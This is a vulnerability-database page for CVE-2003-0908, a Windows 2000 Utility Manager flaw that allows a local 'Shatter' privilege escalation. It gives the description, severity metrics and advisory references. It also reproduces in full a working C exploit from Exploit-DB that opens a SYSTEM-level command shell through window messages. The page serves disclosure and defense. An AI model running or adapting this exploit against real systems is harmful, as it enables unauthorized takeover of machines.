CVE-2003-0908 : Detail

CVE-2003-0908

4.32%V4
Local
2004-04-16
02h00 +00:00
2018-10-12
17h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with system privileges, which allows local users to execute arbitrary code via a "Shatter" style attack using a Windows message that accesses the context sensitive help button in the GUI, as demonstrated using the File Open dialog in the Help window, a different vulnerability than CVE-2004-0213.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 271

Publication date : 2004-04-14 22h00 +00:00
Author : Cesar Cerrudo
EDB Verified : Yes

// By Cesar Cerrudo cesar appsecinc com // Local elevation of priviliges exploit for Windows Utility Manager // Gives you a shell with system privileges // If you have problems try changing Sleep() values. #include <stdio.h> #include <windows.h> #include <commctrl.h> #include <Winuser.h> int main(int argc, char *argv[]) { HWND lHandle, lHandle2; POINT point; char sText[]="%windir%\\system32\\cmd.ex?"; // run utility manager system("utilman.exe /start"); Sleep(500); // execute contextual help SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0); Sleep(500); // open file open dialog windown in Windows Help PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0); Sleep(500); // find open file dialog window lHandle = FindWindow("#32770","Open"); // get input box handle lHandle2 = GetDlgItem(lHandle, 0x47C); Sleep(500); // set text to filter listview to display only cmd.exe SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText); Sleep(800); // send return SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0); //get navigation bar handle lHandle2 = GetDlgItem(lHandle, 0x4A0); //send tab SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0); Sleep(500); lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL); //get list view handle lHandle2 = GetDlgItem(lHandle2, 0x1); SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char Sleep(500); // popup context menu PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0); Sleep(1000); // get context menu handle point.x =10; point.y =30; lHandle2=WindowFromPoint(point); SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window return(0); } // milw0rm.com [2004-04-15]

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

References

http://www.securityfocus.com/bid/10124
Tags : vdb-entry, x_refsource_BID
http://www.ciac.org/ciac/bulletins/o-114.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://www.kb.cert.org/vuls/id/526084
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.us-cert.gov/cas/techalerts/TA04-104A.html
Tags : third-party-advisory, x_refsource_CERT